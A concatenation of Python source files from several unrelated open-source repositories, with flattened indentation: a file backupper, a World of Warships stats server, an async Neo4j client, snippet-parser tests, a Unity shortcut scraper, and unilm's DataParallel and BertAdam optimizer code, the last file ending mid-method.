#### File: utils/file_backupper/file_backupper.py
```python
from datetime import datetime
from math import ceil
from time import sleep
from os import mkdir
from os.path import isdir, basename, splitext
def save_file(file_path: str) -> str:
"""
Back up the specified file with rename.
Parameters
----------
file_path : str
The path of the file you want to back up.
Returns
----------
result : str
success or failed
"""
file_data = read_file(file_path)
if file_path is None:
result = "failed"
return result
splited = splitext(basename(file_path))
dir_path = "./{}".format(splited[0])
if not isdir(dir_path):
mkdir(dir_path)
now = datetime.now()
save_time = now.strftime('%Y-%m-%d_%H%M')
save_file_path = "{}/{}{}{}".format(dir_path, splited[0], save_time, splited[1])
with open(save_file_path, 'w', encoding="utf-8_sig") as new_file:
new_file.write(file_data)
result = "Success"
return result
def read_file(file_path):
"""
Open the file and return the contents
Parameters
----------
file_path : str
The path of the file.
Returns
----------
file_data : str
Data in the file
"""
try:
with open(file_path, 'r', encoding="utf-8_sig") as target_file:
file_data = target_file.read()
except FileNotFoundError:
file_data = None
print('File not Found!')
return file_data
def wait_the_time() -> str:
"""
Wait for the hour.
Returns
----------
date_str : str
Time to start processing
"""
while True:
now = datetime.now()
if now.minute == 0:
break
else:
diff = (3600 - (now.minute * 60 + now.second))
interval = ceil(diff/2)
sleep(interval)
now_str = now.strftime('%Y-%m-%d %H:%M:%S')
return now_str
if __name__ == "__main__":
FILE_PATH = "path"
while True:
print(wait_the_time())
print(save_file(FILE_PATH))
sleep(60)
``` |
{
"source": "4KaNE/wows-stats-python",
"score": 3
} |
#### File: wows-stats-python/application/replayfile_monitor.py
```python
from os import path
from json import load, JSONDecodeError
class ReplayFileMonitor():
"""
Classes that monitor replay file folders
"""
def __init__(self, wows_path):
self.replays_path = path.join(wows_path, "replays")
self.arenainfo = path.join(self.replays_path, "tempArenaInfo.json")
self.flag = False
def check_arenainfo(self):
change = False
if path.exists(self.arenainfo):
if not self.flag:
self.flag = True
change = True
else:
self.flag = False
return change
def open_arenainfo(self):
try:
with open(self.arenainfo, "r", encoding="utf-8_sig") as json_file:
try:
data = load(json_file)
except JSONDecodeError:
data = None
self.flag = False
except IOError:
data = None
self.flag = False
return data
```
#### File: 4KaNE/wows-stats-python/main.py
```python
import os
import configparser
from datetime import datetime
from time import sleep
from json import load, dumps
from json.decoder import JSONDecodeError
import datetime
from bottle import route, run, static_file, request, Bottle, abort
from gevent.pywsgi import WSGIServer
from geventwebsocket import WebSocketError
from geventwebsocket.handler import WebSocketHandler
from tqdm import tqdm
from application import wows_api_wrapper, ships_info, wows_stats, replayfile_monitor, cp_calculator
INIFILE = configparser.SafeConfigParser()
INIFILE.read('./config/config.ini', 'UTF-8')
APP_ID = INIFILE["config"]["application_id"]
REGION = INIFILE["config"]["region"]
WOWS_PATH = INIFILE["config"]["wows_path"]
SI = ships_info.ShipInfo(APP_ID, REGION)
WAW = wows_api_wrapper.APIWrapper(APP_ID, REGION)
RFM = replayfile_monitor.ReplayFileMonitor(WOWS_PATH)
CPC = cp_calculator.CPCalculator()
APP = Bottle()
SERVER = WSGIServer(("0.0.0.0", 8080), APP, handler_class=WebSocketHandler)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
def create_data(ArenaInfo):
wst = wows_stats.WoWsStats()
pbar = tqdm(total=100, desc="Loading")
ratio = 100 // len(ArenaInfo["vehicles"])
tortal = 0
for vehicle in ArenaInfo["vehicles"]:
wst.init_user_dict()
ign = vehicle["name"]
wst.add_ign(ign)
account_id = WAW.fetch_accountid(ign)
wst.add_userid(account_id)
clan_id = WAW.fetch_clan_id(account_id)
clan_tag = None if clan_id is None else WAW.fetch_clan_tag(clan_id)
wst.add_clan(clan_tag)
ship_id = vehicle["shipId"]
wst.add_ship_info(ship_id, SI.tier(ship_id), SI.name(
ship_id), SI.nation(ship_id), SI.ship_type(ship_id))
personal_data = WAW.fetch_personal_data(account_id)
ship_stats, rank_info = None if personal_data is None else WAW.fetch_ship_stats(
account_id, ship_id), WAW.fetch_rank_stats(account_id)
wst.add_personal_data(personal_data)
wst.add_ship_stats(ship_stats)
wst.add_rank(rank_info)
wst.add_combat_power(CPC.combat_power(wst.user_dict), 1)
wst.add_combat_power(CPC.personal_rating(wst.user_dict), 2)
wst.update_tmplist(vehicle["relation"])
pbar.update(ratio)
tortal += ratio
wst.sort_tmplist()
data = wst.create_stats_dict(ArenaInfo["mapDisplayName"])
rem = 100 - tortal
pbar.update(rem)
pbar.close()
return data
@APP.route('/static/<file_path:path>')
def static(file_path):
"""
Returning static file when accessing localhost:8080/static/
"""
return static_file(file_path, root='{}/static'.format(BASE_DIR))
@APP.route('/websocket')
def handle_websocket():
"""
WebSocket Handler
Return data once every 5 seconds
"""
websocket = request.environ.get('wsgi.websocket')
if not websocket:
abort(400, 'Expected WebSocket request.')
while True:
if not RFM.check_arenainfo():
sleep(3)
continue
arenainfo = RFM.open_arenainfo()
if arenainfo is None:
sleep(3)
continue
data = create_data(arenainfo)
try:
handler = websocket.handler
for client in handler.server.clients.values():
client.ws.send(dumps(data))
except WebSocketError:
break
@APP.route('/')
def top():
"""
Returning WebSocket client when accessing localhost:8080/
"""
return static_file('static/index.html', root='./')
SERVER.serve_forever()
``` |
{
"source": "4Kaylum/aioneo4j-v4",
"score": 3
} |
#### File: aioneo4j-v4/aioneo4j-v4/client.py
```python
import asyncio
import collections
import logging
from yarl import URL
from .transport import Transport
logger = logging.getLogger("aioneo4j.client")
class Client(object):
r"""
A Neo4j client object, used to interface with your Neo4j database.
Parameters
-----------
host: :class:`str`
The host URL that we want to connect to via HTTP.
port: :class:`int`
The port that we want to connect to the database via.
user: :class:`str`
The username we want to authenticate as.
password: :class:`str`
The password we want to authenticate our user as.
database: :class:`str`
The database you want to connect to.
transport: Optional[:class:`Transport`]
The aiohttp transport method for actually performing given requests.
request_timeout: Optional[:class:`float`]
How long a request should wait to process before timing out.
"""
def __init__(
self, host:str="127.0.0.1", port:int=7474, user:str=None, password:str=None, database:str=None, transport:Transport=Transport,
request_timeout:float=..., *, loop=None):
self.loop = loop or asyncio.get_event_loop()
url = URL(f"http://{host}:{port}")
logger.info(f"Creating a client object with url {url}")
auth = (user, password,)
self.transport = transport(
url=url,
auth=auth,
database=database,
request_timeout=request_timeout,
loop=self.loop,
)
def get_auth(self):
return self.transport.auth
def set_auth(self, auth):
self.transport.auth = auth
auth = property(get_auth, set_auth)
del get_auth, set_auth
async def cypher(self, query:str, path:str='tx/commit', request_timeout:float=..., **params):
r"""
Run a cypher on the database.
Parameters
-----------
query: :class:`str`
The query you want to run.
kwargs:
Any of the kwargs you give the cypher will be used as input variables.
"""
# If the query is a dict, we'll assume they gave the actual POST data and go from there
if isinstance(query, collections.Mapping):
assert not params
request = query
else:
request = {'statement': query}
if params:
request['parameters'] = params
request = {'statements': [request]}
logger.info(f"Sending web request to /{path} with data {request}")
_, data = await self.transport.perform_request(
'POST',
path,
data=request,
request_timeout=request_timeout,
)
return data
# async def transaction_commit(self, *statements, path='db/data/transaction/commit', request_timeout=...):
# r"""Commit a transaction"""
# # Parse out the multiple statements given
# if len(statements) == 1 and isinstance(statements[0], collections.Mapping) and 'statements' in statements[0]:
# request = statements[0]
# else:
# request = {'statements': []}
# for statement in statements:
# if not isinstance(statement, collections.Mapping):
# statement = {'statement': statement}
# else:
# if 'statement' not in statement:
# raise ValueError
# request['statements'].append(statement)
# _, data = await self.transport.perform_request(
# 'POST',
# path,
# data=request,
# request_timeout=request_timeout,
# )
# return data
# async def indexes(self, path='db/data/schema/index', request_timeout=...):
# _, data = await self.transport.perform_request(
# 'GET',
# path,
# request_timeout=request_timeout,
# )
# return data
# async def constraints(self, path='db/data/schema/constraint', request_timeout=...):
# _, data = await self.transport.perform_request(
# 'GET',
# path,
# request_timeout=request_timeout,
# )
# return data
# async def user_password(self, password, username='neo4j', path='user/{username}/password', set_auth=False, request_timeout=...):
# path = path.format(username=username,)
# request = {'password': password}
# _, data = await self.transport.perform_request(
# 'POST',
# path,
# data=request,
# request_timeout=request_timeout,
# )
# if set_auth:
# auth = username, password
# self.auth = auth
# return data
async def close(self):
await self.transport.close()
async def __aenter__(self):
return self
async def __aexit__(self, *exc_info):
await self.close()
```
#### File: aioneo4j-v4/aioneo4j-v4/transport.py
```python
import asyncio
import collections
import json
import logging
import aiohttp
import async_timeout
from aiohttp import ClientError
from . import errors
logger = logging.getLogger("aioneo4j.transport")
class Transport:
r"""
A transport object for a Neo4j client, which performs all the heavy lifting requests on the backend for the client.
Parameters
-----------
url: :class:`str`
The base URL of the database for us to connect to.
auth: :class:`tuple`
The (username, password) pair for us to authenticate with.
database: :class:`str`
The name of the database we'll be connecting to.
request_timeout: :class:`float`
The timeout to be used when performing a request.
"""
_auth = None
def __init__(self, url, auth, database, encoder=json.dumps, decoder=json.loads, encoder_errors=(TypeError, ValueError), decoder_errors=(TypeError, ValueError), request_timeout=..., session=None, maxsize=20, use_dns_cache=False, *, loop ):
self.loop = loop
self.url = url
self.database = database
self.auth = auth
self.encoder = encoder
self.decoder = decoder
self.encoder_errors = encoder_errors
self.decoder_errors = decoder_errors
self.request_timeout = request_timeout
self.session = session
if self.session is None:
self.session = aiohttp.ClientSession(
connector=aiohttp.TCPConnector(
limit=maxsize,
use_dns_cache=use_dns_cache,
loop=self.loop,
),
)
def get_auth(self):
return self._auth
def set_auth(self, auth):
if auth is not None:
if isinstance(auth, str):
username, password = auth.split(':')
elif isinstance(auth, collections.Sequence):
username, password = auth
auth = aiohttp.BasicAuth(
login=username,
password=password,
)
self._auth = auth
auth = property(get_auth, set_auth)
del get_auth, set_auth
@property
def headers(self):
return {
'Content-Type': 'application/json',
'Accept': 'application/json; charset=UTF-8',
}
async def _perform_request(self, method, url, params=None, data=None):
response = None
try:
logger.debug(f"Sending {method.upper()} {url} ({params}) with data {data}")
response = await self.session.request(
method,
url,
params=params,
data=data,
headers=self.headers,
auth=self.auth,
timeout=None,
)
text = await response.text()
if not (200 <= response.status <= 300):
extra = None
try:
extra = self.decoder(text)
except self.decoder_errors:
pass
raise errors.ClientError(response.status, extra or text)
return response.status, response.headers, text
except ClientError as exc:
logger.error(exc)
raise errors.TransportError from exc
finally:
if response is not None:
await response.release()
async def perform_request(self, method:str, path:str, params:dict=None, data:dict=None, request_timeout:float=...):
r"""Perform a web request at the database
Parameters
-----------
method: :class:`str`
The method to be used when performing the request
path: :class:`str`
The endpoint you want to ping the request to
params: :class:`dict`
The URL parameters to use
data: :class:`dict`
The JSON data to send, if any
request_timeout: :class:`float`
The timeout you want to use when performing the request
Returns
--------
The resulting data as a (status_code, headers, data) triplet
"""
# Encode the data
if data is not None:
logger.debug(f"Encoding data {data}")
if not isinstance(data, (str, bytes)):
try:
data = self.encoder(data)
except self.encoder_errors as exc:
raise errors.SerializationError from exc
if not isinstance(data, bytes):
data = data.encode('utf-8')
# Work out our URL
_url = self.url / f'db/{self.database}/{path}'
_coro = self._perform_request(method, _url, params=params, data=data)
# Work out our timeout
_request_timeout = request_timeout
if request_timeout is ...:
_request_timeout = self.request_timeout
if _request_timeout is ...:
_request_timeout = None
# Perform the request
try:
with async_timeout.timeout(_request_timeout, loop=self.loop):
status, headers, data = await _coro
except asyncio.TimeoutError:
raise errors.TimeoutError
# If we got data, let's decode that
if data:
try:
data = self.decoder(data)
except self.decoder_errors as exc:
raise errors.SerializationError from exc
# There's an error in the data? Raise that
if isinstance(data, collections.Mapping) and data.get('errors'):
raise errors.ClientError(data['errors'])
# Return the status code and the data given
return status, data
async def close(self):
await self.session.close()
``` |
{
"source": "4kelly/snipfile",
"score": 3
} |
#### File: test/unit/test_parser.py
```python
from typing import List, NamedTuple, Union
from snipfile._parser import Snippet, Token, is_a_snippet, parser, tokenize
def test_is_a_snippet():
class Case(NamedTuple):
test: str
want: bool
cases = [
Case("--8<-- filename.txt", True),
Case("--8<--", True),
# Case("\t--8<--", True),
# Case(" --8<--", True),
Case("Not a line --8<--", False),
Case("Not a line", False),
]
for case in cases:
got = is_a_snippet(case.test)
assert got == case.want
def test_tokenize():
class Case(NamedTuple):
name: str
test: str
want_items: List[str]
want_tokens: List[Token]
cases = [
Case(
"Happy Path",
"--8<-- filename.txt",
["--8<--", "filename.txt"],
[Token.SNIPPET, Token.FILEPATH],
),
Case(
"Happy Path Line Range",
"--8<-- filename.txt 1 3",
["--8<--", "filename.txt", "1", "3"],
[Token.SNIPPET, Token.FILEPATH, Token.LINENUM, Token.LINENUM],
),
Case(
"Weird Spacing",
" --8<-- filename.txt 1 3",
["--8<--", "filename.txt", "1", "3"],
[Token.SNIPPET, Token.FILEPATH, Token.LINENUM, Token.LINENUM],
),
Case(
"Happy Path Negative Line",
"--8<-- filename.txt -1",
["--8<--", "filename.txt", "-1"],
[Token.SNIPPET, Token.FILEPATH, Token.LINENUM],
),
Case(
"Filename with parent directory",
"--8<-- ../filename.txt",
["--8<--", "../filename.txt"],
[Token.SNIPPET, Token.FILEPATH],
),
Case(
"Filename with sub directory",
"--8<-- dir/filename.txt",
["--8<--", "dir/filename.txt"],
[Token.SNIPPET, Token.FILEPATH],
),
Case("Snippet Only", "--8<--", ["--8<--"], [Token.SNIPPET]),
]
for case in cases:
got_items = []
got_tokens = []
token_generator = tokenize(case.test)
for item, token in token_generator:
got_items.append(item)
got_tokens.append(token)
assert got_items == case.want_items
assert got_tokens == case.want_tokens
def test_parse_snippet():
class Case(NamedTuple):
name: str
test_items: List[Union[str, int]]
test_tokens: List[Token]
want: Snippet
cases = [
Case(
"Happy Path",
["--8<--", "filename.txt"],
[Token.SNIPPET, Token.FILEPATH],
Snippet(filepath="filename.txt"),
),
Case(
"Happy Path Line Range",
["--8<--", "filename.txt", 1, 3],
[Token.SNIPPET, Token.FILEPATH, Token.LINENUM, Token.LINENUM],
Snippet(filepath="filename.txt", startline=1, endline=3),
),
]
for case in cases:
got = parser(case.test_items, case.test_tokens)
assert got == case.want
``` |
{
"source": "4ker/ShortcutMapper",
"score": 3
} |
#### File: sources/unity3d/raw_to_intermediate.py
```python
import sys
import os
import logging
import argparse
import re
import codecs
from bs4 import BeautifulSoup
# Import common scripts
CWD = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, CWD)
sys.path.insert(0, os.path.normpath(os.path.join(CWD, '..', '..')))
# Import common shortcut mapper library
import shmaplib
log = shmaplib.setuplog(os.path.join(CWD, 'output.log'))
class RawDocsParser(object):
"""This parser scrapes shortcuts and contexts from the unity documentation html file, such as:
http://docs.unity3d.com/Manual/UnityHotkeys.html
It assumes the main relevant data is contained in a wrapper div: <div class="section">...</div>
From the contents of this div, it can extract shortcut contexts, shortcut names and keys for Windows and MacOS
"""
def __init__(self):
super(RawDocsParser, self).__init__()
self.idata = shmaplib.IntermediateShortcutData("Unity 3D")
def parse(self, source_filepath):
if not os.path.exists(source_filepath):
log.error("Source file '%s' does not exist", source_filepath)
return
# Read file contents
f = codecs.open(source_filepath, encoding='utf-8')
contents = f.read()
f.close()
# Use BeautifulSoup to parse the html document
doc = BeautifulSoup(contents)
main_wrapper_div = doc.find("div", class_="section")
tables = main_wrapper_div.find_all("table")
# Iterate sections
# - the first tr is ignored, this is actually the header
context_name = "Global Context"
for table in tables:
rows = table.tbody.find_all("tr")
for row in rows[1:]:
# The row contains 2 cols with shortcut on left, and info on right
cols = row.find_all("td")
# Skip the non-shortcut cols
if len(cols) != 2:
continue
if cols[0].em is not None:
continue
keys = cols[0].get_text()
label = cols[1].get_text()
# Split up into windows and mac shortcuts
# Example: CTRL/CMD+ALT+P
keys_win = keys
keys_mac = keys
if '/' in keys:
mods, keys = tuple(keys.split('+', 1))
mods = mods.split('/')
keys_win = mods[0] + "+" + keys
keys_mac = mods[1] + "+" + keys
self.idata.add_shortcut(context_name, label, keys_win, keys_mac)
log.debug('...found shortcut "%s"', label)
return self.idata
def main():
parser = argparse.ArgumentParser(description="Converts Unity's raw files to an intermediate format.")
parser.add_argument('-v', '--verbose', action='store_true', required=False, help="Verbose output")
parser.add_argument('-o', '--output', required=True, help="Output filepath")
parser.add_argument('source', help="Source: HTML file containing shortcuts saved directly from adobe's online documentation (/raw folder)")
args = parser.parse_args()
args.source = os.path.abspath(args.source)
args.output = os.path.abspath(args.output)
if not os.path.exists(args.source):
print("Error: the input source file doesn't exist.")
return
# Verbosity setting on log
log.setLevel(logging.INFO)
if args.verbose:
log.setLevel(logging.DEBUG)
# Parse the docs html
docs_idata = RawDocsParser().parse(args.source)
docs_idata.serialize(args.output)
if __name__ == '__main__':
main()
``` |
{
"source": "4kssoft/unilm",
"score": 3
} |
#### File: src/nn/data_parallel.py
```python
import torch
from torch.nn import DataParallel
from torch.cuda._utils import _get_device_index
from torch.nn.parallel._functions import Scatter
from itertools import chain
def scatter_imbalance(inputs, target_gpus, dim=0):
r"""
Slices tensors into approximately equal chunks and
distributes them across given GPUs. Duplicates
references to objects that are not tensors.
"""
def scatter_map(obj):
if isinstance(obj, torch.Tensor):
if (len(target_gpus) == 4) and (obj.size(dim) == 22):
return Scatter.apply(target_gpus, (4, 6, 6, 6), dim, obj)
if (len(target_gpus) == 4) and (obj.size(dim) == 60):
return Scatter.apply(target_gpus, (12, 16, 16, 16), dim, obj)
elif (len(target_gpus) == 4) and (obj.size(dim) == 144):
return Scatter.apply(target_gpus, (24, 40, 40, 40), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 46):
return Scatter.apply(target_gpus, (4, 6, 6, 6, 6, 6, 6, 6), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 62):
return Scatter.apply(target_gpus, (6, 8, 8, 8, 8, 8, 8, 8), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 94):
return Scatter.apply(target_gpus, (10, 12, 12, 12, 12, 12, 12, 12), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 110):
return Scatter.apply(target_gpus, (12, 14, 14, 14, 14, 14, 14, 14), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 118):
return Scatter.apply(target_gpus, (13, 15, 15, 15, 15, 15, 15, 15), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 126):
return Scatter.apply(target_gpus, (14, 16, 16, 16, 16, 16, 16, 16), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 134):
return Scatter.apply(target_gpus, (15, 17, 17, 17, 17, 17, 17, 17), dim, obj)
elif (len(target_gpus) == 8) and (obj.size(dim) == 142):
return Scatter.apply(target_gpus, (16, 18, 18, 18, 18, 18, 18, 18), dim, obj)
elif (len(target_gpus) == 16) and (obj.size(dim) == 222):
return Scatter.apply(target_gpus, (12, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14), dim, obj)
return Scatter.apply(target_gpus, None, dim, obj)
if isinstance(obj, tuple) and len(obj) > 0:
return list(zip(*map(scatter_map, obj)))
if isinstance(obj, list) and len(obj) > 0:
return list(map(list, zip(*map(scatter_map, obj))))
if isinstance(obj, dict) and len(obj) > 0:
return list(map(type(obj), zip(*map(scatter_map, obj.items()))))
return [obj for targets in target_gpus]
# After scatter_map is called, a scatter_map cell will exist. This cell
# has a reference to the actual function scatter_map, which has references
# to a closure that has a reference to the scatter_map cell (because the
# fn is recursive). To avoid this reference cycle, we set the function to
# None, clearing the cell
try:
return scatter_map(inputs)
finally:
scatter_map = None
def scatter_kwargs_imbalance(inputs, kwargs, target_gpus, dim=0):
r"""Scatter with support for kwargs dictionary"""
inputs = scatter_imbalance(inputs, target_gpus, dim) if inputs else []
kwargs = scatter_imbalance(kwargs, target_gpus, dim) if kwargs else []
if len(inputs) < len(kwargs):
inputs.extend([() for _ in range(len(kwargs) - len(inputs))])
elif len(kwargs) < len(inputs):
kwargs.extend([{} for _ in range(len(inputs) - len(kwargs))])
inputs = tuple(inputs)
kwargs = tuple(kwargs)
return inputs, kwargs
class DataParallelImbalance(DataParallel):
def __init__(self, module, device_ids=None, output_device=None, dim=0):
super(DataParallelImbalance, self).__init__(
module, device_ids, output_device, dim)
if not torch.cuda.is_available():
self.module = module
self.device_ids = []
return
if device_ids is None:
device_ids = list(range(torch.cuda.device_count()))
if output_device is None:
output_device = device_ids[0]
if not all(t.is_cuda and t.device.index == device_ids[0]
for t in chain(module.parameters(), module.buffers())):
raise RuntimeError("module must have its parameters and buffers "
"on device %d (device_ids[0])" % device_ids[0])
self.dim = dim
self.module = module
self.device_ids = list(
map(lambda x: _get_device_index(x, True), device_ids))
self.output_device = _get_device_index(output_device, True)
if len(self.device_ids) == 1:
self.module.cuda(device_ids[0])
def forward(self, *inputs, **kwargs):
if not self.device_ids:
return self.module(*inputs, **kwargs)
inputs, kwargs = self.scatter_imbalance(
inputs, kwargs, self.device_ids)
if len(self.device_ids) == 1:
return self.module(*inputs[0], **kwargs[0])
replicas = self.replicate(self.module, self.device_ids[:len(inputs)])
outputs = self.parallel_apply(replicas, inputs, kwargs)
return self.gather(outputs, self.output_device)
def scatter_imbalance(self, inputs, kwargs, device_ids):
return scatter_kwargs_imbalance(inputs, kwargs, device_ids, dim=self.dim)
```
#### File: src/pytorch_pretrained_bert/optimization.py
```python
import math
import torch
from torch.optim import Optimizer
from torch.optim.optimizer import required
from torch.nn.utils import clip_grad_norm_
from collections import defaultdict
from torch._six import container_abcs
from copy import deepcopy
from itertools import chain
def warmup_cosine(x, warmup=0.002):
if x < warmup:
return x/warmup
return 0.5 * (1.0 + torch.cos(math.pi * x))
def warmup_constant(x, warmup=0.002):
if x < warmup:
return x/warmup
return 1.0
def warmup_linear(x, warmup=0.002):
if x < warmup:
return x/warmup
return max((x-1.)/(warmup-1.), 0)
SCHEDULES = {
'warmup_cosine': warmup_cosine,
'warmup_constant': warmup_constant,
'warmup_linear': warmup_linear,
}
class BertAdam(Optimizer):
"""Implements BERT version of Adam algorithm with weight decay fix.
Params:
lr: learning rate
warmup: portion of t_total for the warmup, -1 means no warmup. Default: -1
t_total: total number of training steps for the learning
rate schedule, -1 means constant learning rate. Default: -1
schedule: schedule to use for the warmup (see above). Default: 'warmup_linear'
b1: Adams b1. Default: 0.9
b2: Adams b2. Default: 0.999
e: Adams epsilon. Default: 1e-6
weight_decay: Weight decay. Default: 0.01
max_grad_norm: Maximum norm for the gradients (-1 means no clipping). Default: 1.0
"""
def __init__(self, params, lr=required, warmup=-1, t_total=-1, schedule='warmup_linear', b1=0.9, b2=0.999, e=1e-6, weight_decay=0.01, max_grad_norm=1.0):
if lr is not required and lr < 0.0:
raise ValueError(
"Invalid learning rate: {} - should be >= 0.0".format(lr))
if schedule not in SCHEDULES:
raise ValueError("Invalid schedule parameter: {}".format(schedule))
if not 0.0 <= warmup < 1.0 and not warmup == -1:
raise ValueError(
"Invalid warmup: {} - should be in [0.0, 1.0[ or -1".format(warmup))
if not 0.0 <= b1 < 1.0:
raise ValueError(
"Invalid b1 parameter: {} - should be in [0.0, 1.0[".format(b1))
if not 0.0 <= b2 < 1.0:
raise ValueError(
"Invalid b2 parameter: {} - should be in [0.0, 1.0[".format(b2))
if not e >= 0.0:
raise ValueError(
"Invalid epsilon value: {} - should be >= 0.0".format(e))
defaults = dict(lr=lr, schedule=schedule, warmup=warmup, t_total=t_total,
b1=b1, b2=b2, e=e, weight_decay=weight_decay,
max_grad_norm=max_grad_norm)
super(BertAdam, self).__init__(params, defaults)
def get_lr(self):
lr = []
for group in self.param_groups:
for p in group['params']:
state = self.state[p]
if len(state) == 0:
return [0]
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(
state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
lr.append(lr_scheduled)
return lr
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['next_m'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['next_v'] = torch.zeros_like(p.data)
next_m, next_v = state['next_m'], state['next_v']
beta1, beta2 = group['b1'], group['b2']
# Add grad clipping
if group['max_grad_norm'] > 0:
clip_grad_norm_(p, group['max_grad_norm'])
# Decay the first and second moment running average coefficient
# In-place operations to update the averages at the same time
next_m.mul_(beta1).add_(1 - beta1, grad)
next_v.mul_(beta2).addcmul_(1 - beta2, grad, grad)
update = next_m / (next_v.sqrt() + group['e'])
# Just adding the square of the weights to the loss function is *not*
# the correct way of using L2 regularization/weight decay with Adam,
# since that will interact with the m and v parameters in strange ways.
#
# Instead we want to decay the weights in a manner that doesn't interact
# with the m/v parameters. This is equivalent to adding the square
# of the weights to the loss with plain (non-momentum) SGD.
if group['weight_decay'] > 0.0:
update += group['weight_decay'] * p.data
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(
state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
update_with_lr = lr_scheduled * update
p.data.add_(-update_with_lr)
state['step'] += 1
# step_size = lr_scheduled * math.sqrt(bias_correction2) / bias_correction1
# No bias correction
# bias_correction1 = 1 - beta1 ** state['step']
# bias_correction2 = 1 - beta2 ** state['step']
return loss
class BertAdamFineTune(BertAdam):
def __init__(self, params, lr=required, warmup=-1, t_total=-1, schedule='warmup_linear', b1=0.9, b2=0.999, e=1e-6, weight_decay=0.01, max_grad_norm=1.0):
self.init_param_group = []
super(BertAdamFineTune, self).__init__(params, lr, warmup,
t_total, schedule, b1, b2, e, weight_decay, max_grad_norm)
def save_init_param_group(self, param_groups, name_groups, missing_keys):
self.init_param_group = []
for group, name in zip(param_groups, name_groups):
if group['weight_decay'] > 0.0:
init_p_list = []
for p, n in zip(group['params'], name):
init_p = p.data.clone().detach()
if any(mk in n for mk in missing_keys):
print("[no finetuning weight decay]", n)
# should use the original weight decay
init_p.zero_()
init_p_list.append(init_p)
self.init_param_group.append(init_p_list)
else:
# placeholder
self.init_param_group.append([])
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for i_group, group in enumerate(self.param_groups):
for i_p, p in enumerate(group['params']):
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['next_m'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['next_v'] = torch.zeros_like(p.data)
next_m, next_v = state['next_m'], state['next_v']
beta1, beta2 = group['b1'], group['b2']
# Add grad clipping
if group['max_grad_norm'] > 0:
clip_grad_norm_(p, group['max_grad_norm'])
# Decay the first and second moment running average coefficient
# In-place operations to update the averages at the same time
next_m.mul_(beta1).add_(1 - beta1, grad)
next_v.mul_(beta2).addcmul_(1 - beta2, grad, grad)
update = next_m / (next_v.sqrt() + group['e'])
# Just adding the square of the weights to the loss function is *not*
# the correct way of using L2 regularization/weight decay with Adam,
# since that will interact with the m and v parameters in strange ways.
#
# Instead we want to decay the weights in a manner that doesn't interact
# with the m/v parameters. This is equivalent to adding the square
# of the weights to the loss with plain (non-momentum) SGD.
if group['weight_decay'] > 0.0:
if self.init_param_group:
update += group['weight_decay'] * \
(2.0 * p.data -
self.init_param_group[i_group][i_p])
else:
update += group['weight_decay'] * p.data
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(
state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
update_with_lr = lr_scheduled * update
p.data.add_(-update_with_lr)
state['step'] += 1
# step_size = lr_scheduled * math.sqrt(bias_correction2) / bias_correction1
# No bias correction
# bias_correction1 = 1 - beta1 ** state['step']
# bias_correction2 = 1 - beta2 ** state['step']
return loss
def load_state_dict_subset_finetune(self, state_dict, num_load_group):
r"""Loads the optimizer state.
Arguments:
state_dict (dict): optimizer state. Should be an object returned
from a call to :meth:`state_dict`.
"""
# deepcopy, to be consistent with module API
state_dict = deepcopy(state_dict)
# Validate the state_dict
groups = self.param_groups
saved_groups = state_dict['param_groups']
if len(groups) < num_load_group or len(saved_groups) < num_load_group:
raise ValueError("loaded state dict has a different number of "
"parameter groups")
param_lens = (len(g['params']) for g in groups[:num_load_group])
saved_lens = (len(g['params']) for g in saved_groups[:num_load_group])
if any(p_len != s_len for p_len, s_len in zip(param_lens, saved_lens)):
raise ValueError("loaded state dict contains a parameter group "
"that doesn't match the size of optimizer's group")
# Update the state
id_map = {old_id: p for old_id, p in
zip(chain(*(g['params'] for g in saved_groups[:num_load_group])),
chain(*(g['params'] for g in groups[:num_load_group])))}
def cast(param, value):
r"""Make a deep copy of value, casting all tensors to device of param."""
if isinstance(value, torch.Tensor):
# Floating-point types are a bit special here. They are the only ones
# that are assumed to always match the type of params.
if param.is_floating_point():
value = value.to(param.dtype)
value = value.to(param.device)
return value
elif isinstance(value, dict):
return {k: cast(param, v) for k, v in value.items()}
elif isinstance(value, container_abcs.Iterable):
return type(value)(cast(param, v) for v in value)
else:
return value
# Copy state assigned to params (and cast tensors to appropriate types).
# State that is not assigned to params is copied as is (needed for
# backward compatibility).
state = defaultdict(dict)
for k, v in state_dict['state'].items():
if k in id_map:
param = id_map[k]
state[param] = cast(param, v)
else:
state[k] = v
# handle additional params
for k, v in self.state:
if k not in state:
state[k] = v
